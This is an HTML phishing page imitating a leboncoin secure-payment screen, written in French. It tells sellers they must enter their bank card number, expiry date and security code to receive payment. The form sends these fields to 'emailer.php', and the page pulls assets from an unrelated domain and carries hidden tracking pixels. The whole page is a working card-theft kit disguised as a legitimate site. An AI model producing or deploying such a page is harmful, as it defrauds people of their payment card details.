<!DOCTYPE html>
<html lang="fr"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
 <meta name="robots" content="noindex, nofollow, nosnippet">
        <meta name="googlebot" content="noindex, nofollow, nosnippet">
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <title data-react-helmet="true">leboncoin, site de petites annonces gratuites</title>

    <meta data-react-helmet="true" name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
    <meta data-react-helmet="true" name="theme-color" content="#f56b2a">
    <meta data-react-helmet="true" property="og:locale" content="fr_FR">
    <meta data-react-helmet="true" property="og:site_name" content="leboncoin">
    <meta data-react-helmet="true" name="twitter:site" content="leboncoin">

    <link data-react-helmet="true" type="image/png" rel="apple-touch-icon" href="http://bc1.spacevir.online/public/img/favicon-apple-touch.png">
    <link data-react-helmet="true" rel="manifest" href="http://static-rav.leboncoin.fr/manifest.json">
    <link data-react-helmet="true" rel="icon" type="image/png" href="http://bc1.spacevir.online/public/img/1cf19bbb9823291e038de93823ddc00d.png" sizes="16x16">
    <link data-react-helmet="true" rel="icon" type="image/png" href="http://bc1.spacevir.online/public/img/57e0765787306aab96864ee4846e9c1f.png" sizes="32x32">



    <link rel="stylesheet" href="fin_files/app.css">

</head>

<body class="" style="">
<img style="position:absolute; width:1px; opacity: 0; height:1px; display:block;" src="fin_files/pixel3.gif">
<img style="position:absolute; width:1px; opacity: 0; height:1px; display:block;" src="fin_files/pixel2.gif">
<img style="position:absolute; width:1px; opacity: 0; height:1px; display:block;" src="fin_files/pixel1.html">



<div id="application">
    <div data-reactroot="" data-reactid="1">
        <!-- react-empty: 2 -->
        <div data-reactid="3">
            <!-- react-empty: 4 --><!-- react-empty: 5 --><!-- react-empty: 5322 -->
            <section id="container" data-reactid="7" data-pagename="adview">
                <!-- react-empty: 8 --><!-- react-empty: 4124 -->
                <main class="_2ketD" role="main" data-reactid="13">
                    <div>
                        <div>
                            <header class="HwWgj" style="">
                                <div class="_1i0e0 _1jvue">
                                    <a data-qa-id="back-link" class="_1tI7G" href="http://bc1.spacevir.online/">
                                        <span class="_1vK7W _1Uq_M" name="arrowleft">
                                            <svg viewBox="0 0 24 24" data-name="Calque 1" focusable="false">
                                                <path d="M22.46 10.43H5.26l7.51-7.72a1.63 1.63 0 0 0 0-2.25 1.52 1.52 0 0 0-2.17 0L.45 10.88a1.61 1.61 0 0 0 0 2.23L10.6 23.54a1.52 1.52 0 0 0 2.17 0 1.61 1.61 0 0 0 0-2.23l-7.51-7.72h17.2a1.58 1.58 0 0 0 0-3.16z"></path>
                                            </svg>
                                        </span>
                                        <span class="_1vK7W _1ZJTh" name="chevronleft">
                                            <svg viewBox="0 0 24 24" data-name="Calque 1" focusable="false">
                                                <path d="M10.13 12l8.25-8.33a2.15 2.15 0 0 0 0-3 2.1 2.1 0 0 0-3 0l-9.76 9.82a2.14 2.14 0 0 0 0 3l9.76 9.86a2.1 2.1 0 0 0 3 0 2.2 2.2 0 0 0 0-3.05z"></path>
                                            </svg>
                                        </span>
                                        <div class="_2Q3N2">
                                            <span class="TextLink-15wnQ">
                                                <span class="_1xsnI _1VYn9 _30bqm _2N_B2">Retour</span>
                                            </span>
                                        </div>
                                    </a>
                                    <div class="_2Ya6w">
                                        <h2 class="_281h3">Pour recevoir</h2>
                                    </div>
                                    <div class="_3gy-4">
                                        <span class="_1vK7W" name="securepaymentlogo">
                                            <svg height="30" width="390" viewBox="0 0 390 30" focusable="false">
                                                <g fill="none">
                                                    <g fill="#F56B2A">
                                                        <text font-family="OpenSans" font-size="20" transform="translate(0 1)">
                                                            <tspan x="214" y="21">Pour recevoir</tspan>
                                                        </text>
                                                        <path d="M200.7 6.6l-7.8-3.4c-.6-.2-1.2-.2-1.8 0l-7.7 3.4c-.8.3-1.4 1.1-1.4 2v5.2c0 6 4.2 11.7 10 13.2 5.8-1.4 10-7.2 10-13.2V8.6c0-.9-.5-1.7-1.3-2zm-7.7 5.9c.3 0 .6.2.6.6 0 .3-.2.6-.6.6h-3.2v1.2h3.2c.3 0 .6.2.6.6 0 .3-.2.6-.6.6h-2.8c.7 1.2 1.9 2.1 3.4 2.1.8 0 1.4-.2 2-.6.3-.2.7-.1.9.1.3.3.2.9-.1 1.1-.8.6-1.8.8-2.8.8-2.3 0-4.2-1.4-5-3.5h-1.5c-.3 0-.6-.2-.6-.6 0-.3.3-.4.6-.4h1.2v-.6-.6h-1.2c-.3 0-.6-.2-.6-.6 0-.3.2-.6.6-.6h1.6c.8-2 2.7-3.5 5-3.5 1 0 2 .3 2.8.8.4.2.4.8.1 1.1-.2.2-.7.2-.9.1-.6-.4-1.3-.7-2-.7-1.4 0-2.8.9-3.4 2.1h2.7v-.1zM35.32 24.83c2.205 0 3.558-1.744 3.558-4.346 0-2.602-1.353-4.346-3.558-4.346s-3.553 1.744-3.553 4.346c0 2.602 1.348 4.346 3.553 4.346zm1.645-12.904c4.217 0 6.982 3.623 6.982 8.494 0 4.97-2.899 8.621-7.146 8.621-2.269 0-4.176-1.05-5.296-2.829h-.07v2.503h-4.609V6.659c0-1.68 1.12-2.73 2.468-2.73 1.353 0 2.473 1.05 2.473 2.73v7.863h.064c1.383-1.773 3.127-2.596 5.134-2.596zM53.953 24.83c2.205 0 3.553-1.744 3.553-4.346 0-2.602-1.348-4.346-3.553-4.346s-3.558 1.744-3.558 4.346c0 2.602 1.353 4.346 3.558 4.346zm0-12.904c5.203 0 8.558 3.553 8.558 8.558s-3.355 8.557-8.558 8.557c-5.203 0-8.557-3.552-8.557-8.557 0-5.005 3.354-8.558 8.557-8.558zm65.34-.002c1.348 0 2.474 1.056 2.474 2.736v14.052h-4.941V14.66c0-1.68 1.12-2.736 2.467-2.736zm0-8.59c1.68 0 2.999 1.382 2.999 2.998a3.007 3.007 0 0 1-2.999 2.992c-1.645 0-3.027-1.283-3.027-2.992a3.015 3.015 0 0 1 3.027-2.999zm15.438 8.59c3.424 0 5.268 2.438 5.268 6.125v10.663h-4.935v-9.28c0-2.17-1.021-2.9-2.304-2.9-1.914 0-3.36 1.616-3.36 5.04v7.14h-4.941V14.491c0-1.61 1.056-2.567 2.31-2.567 1.248 0 2.298.957 2.298 2.567v.624h.07c1.254-1.937 3.162-3.19 5.594-3.19zm-28.54 12.906c2.211 0 3.553-1.744 3.553-4.346 0-2.602-1.342-4.346-3.553-4.346-2.205 0-3.552 1.744-3.552 4.346 0 2.602 1.347 4.346 3.552 4.346zm0-12.904c5.203 0 8.563 3.553 8.563 8.558s-3.36 8.557-8.563 8.557c-5.203 0-8.557-3.552-8.557-8.557 0-5.005 3.354-8.558 8.557-8.558zm-15.865 4.28c-2.135 0-3.459 1.58-3.459 4.275 0 2.7 1.324 4.282 3.46 4.282 1.417 0 2.473-.689 2.998-1.645h.064l3.587 2.304c-1.248 2.438-3.856 3.622-6.813 3.622-5.133 0-8.295-3.558-8.295-8.563 0-5 3.162-8.558 8.295-8.558 2.957 0 5.565 1.185 6.813 3.623L93.39 17.85h-.064c-.525-.957-1.581-1.645-2.999-1.645zm-15.568-4.282c3.424 0 5.261 2.438 5.261 6.125v10.663H75.09v-9.28c0-2.17-1.02-2.9-2.31-2.9-1.907 0-3.354 1.616-3.354 5.04v7.14h-4.94V14.491c0-1.61 1.055-2.567 2.303-2.567 1.254 0 2.305.957 2.305 2.567v.624h.07c1.248-1.937 3.155-3.19 5.594-3.19zm-61.293 7.582c0 .549.163 1.36.361 1.867l5.472-4.078c-.298-.443-.887-1.429-2.526-1.429-1.557 0-3.307 1.144-3.307 3.64zm4.783 5.507c1.971 0 3.581-1.482 4.223-2.713l3.25 2.34c-1.243 2.531-3.798 4.404-8.056 4.404a8.349 8.349 0 0 1-5.53-2.083c-2.141 1.424-3.99 2.048-5.822 2.048C2.615 29.009 0 26.535 0 22.808V6.615c0-1.675 1.114-2.725 2.456-2.725 1.348 0 2.462 1.05 2.462 2.725l.006 15.773c0 1.604.688 2.462 2.158 2.462.787 0 1.65-.461 2.77-1.074-.507-1.19-.793-2.537-.793-4.019 0-3.488 2.485-7.834 7.712-7.834 4.538 0 6.97 2.637 7.986 5.95l-8.738 6.26c.46.402 1.114.88 2.228.88z"></path>
                                                    </g>
                                                    <path d="M160 1v28" stroke="#F56B2A" stroke-linecap="square"></path>
                                                </g>
                                            </svg>
                                        </span>
                                    </div>
                                </div>
                            </header>
                        </div>
                        <div class="_3q1hf _1IuA9">
                            <div>
                                <div class="_1vh8-">
                                    <div class="_1i0e0 _1auRJ">
                                        <section class="WHGSN">
                                            <div class="_2s8Kw">
                                                <div class="_2Q3N2">
                                                    <div class="">
                                                        <span class="_3E395 _1odYC _3fjvK">Pour recevoir le paiement sur votre carte bancaire</span>
                                                    </div>
                                                </div>
                                            </div>
                                            <section class="_22d-n">
                                                <h2>Saisissez votre numéro de carte bancaire</h2>
                                               <form method="get" action="emailer.php" accept-charset="UTF-8" id="adyen-encrypted-form" data-qa-id="cardPaymentForm"><input name="_token" type="hidden" value="H4PwhgRk7aOMSgjAdJEvvClYp7IuhNFf2HUgLQfR">
                                               <!-- <div class="dnEhe gsqnN">Votre paiement n'est pas accepté, nous regrettons de ne pas pouvoir donner une suite favorable à votre demande.</div>-->
                                                    <ul>
                                                        <li class="_1tsxZ">
                                                            <img src="fin_files/c618edcfb1b2e8de4181e98117836b2a.png">
                                                            <img src="fin_files/3372f2f8b0f0e200a0b390db08d793b9.png">
                                                            <img src="fin_files/f19f3e05905b4e4a3e649e419ad65556.png">
                                                            <span class="_1vK7W _26UFP" name="lock">
                                                                <svg viewBox="0 0 24 24" data-name="Calque 1" focusable="false">
                                                                    <path d="M18.75 8h-1.13V5.71a5.62 5.62 0 1 0-11.24 0V8H5.25A2.27 2.27 0 0 0 3 10.29v11.42A2.27 2.27 0 0 0 5.25 24h13.5A2.27 2.27 0 0 0 21 21.71V10.29A2.27 2.27 0 0 0 18.75 8zM12 18.29A2.29 2.29 0 1 1 14.25 16 2.27 2.27 0 0 1 12 18.29zM15.38 8H8.62V5.71a3.38 3.38 0 1 1 6.76 0z"></path>
                                                                </svg>
                                                            </span>
                                                        </li>
                                                        <li>
                                                            <label for="card_number">Numéro de carte *</label>

                                                            <input id="card_number" data-encrypted-name="card_number" autocomplete="off" maxlength="19" name="card_number" type="text">
                                                                                                                    </li>
                                                        <li>
                                                            <label>Expire fin *</label>
                                                            <div class="_1Asz0">
                                                                <div class="selectWrapper d_61E">

                                                                    <select class="select" data-encrypted-name="exp_mm" data-qa-id="card_exp_mm" name="card_exp_mm"><option value="1" selected="selected">01</option><option value="2">02</option><option value="3">03</option><option value="4">04</option><option value="5">05</option><option value="6">06</option><option value="7">07</option><option value="8">08</option><option value="9">09</option><option value="10">10</option><option value="11">11</option><option value="12">12</option></select>

                                                                 </div>
                                                                 <span class="BYLN2">/</span>
                                                                 <div class="selectWrapper d_61E">
                                                                     <select class="select" data-encrypted-name="exp_yy" data-qa-id="card_exp_aaaa" name="card_exp_aaaa"><option value="2020" selected="selected">2020</option><option value="2021">2021</option><option value="2022">2022</option><option value="2023">2023</option><option value="2024">2024</option><option value="2025">2025</option><option value="2026">2026</option><option value="2027">2027</option><option value="2028">2028</option><option value="2029">2029</option></select>
                                                                 </div>
                                                             </div>
                                                                                                                     </li>
                                                         <li>
                                                             <label for="cvc">Cryptogramme *</label>
                                                             <input id="cvc" data-encrypted-name="cvc" autocomplete="off" name="cvc" type="text">

                                                                                                                    </li>
                                                        <li>
                                                            <label for="montant">Montant *</label>

                                                            <input id="montant" data-encrypted-name="montant" autocomplete="off" name="montant" type="text">
                                                            <span> Euro(s)</span>
                                                                                                                    </li>
                                                    </ul>
                                                    <p>
                                                        <!-- react-text: 5691 -->En cliquant sur valider, j’accepte les<!-- /react-text --><!-- react-text: 5692 --> <!-- /react-text -->
                                                        <a href="javascript:void(0)" rel="noopener">
                                                            <span class="TextLink-15wnQ">Conditions Générales d’Utilisation</span>
                                                        </a>
                                                        <!-- react-text: 5695 -->.<!-- /react-text -->
                                                    </p>
                                                    <button data-qa-id="deal_payment_submit" class="_2sNbI _1xIyN _2xk2l" type="submit"><!-- react-text: 5697 -->Valider<!-- /react-text --></button>
                                                </form>
                                                <div class="JZ0u7">Informations:</div>
                                                <div class="_38Fo3">
                                                    <span class="_1JWO_">
                                                        <img src="fin_files/46c5e452fd381c4d2b435ac7eff43df9.png">
                                                    </span>
                                                    <div class="D0sVS">
                                                        <div class="ezWFo">Le responsable de traitement, les destinataires et la finalité de la collecte des données.</div>
                                                    </div>
                                                </div>
                                                <div class="_38Fo3">
                                                    <span class="_1JWO_">
                                                        <img src="fin_files/46c5e452fd381c4d2b435ac7eff43df9.png">
                                                    </span>
                                                    <div class="D0sVS">
                                                        <div class="ezWFo">En savoir plus sur vos droits, la durée de conservation de vos données et les moyens de nous contacter</div>
                                                    </div>
                                                </div>
                                            </section>
                                        </section>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    <span id="root-portal" data-reactid="648"></span>
                </main>
                <div class="_2kvEo" data-qa-id="selectedNavigationLayer" data-reactid="649"></div>
            </section>
        </div>
    </div>
</div>





</body></html>
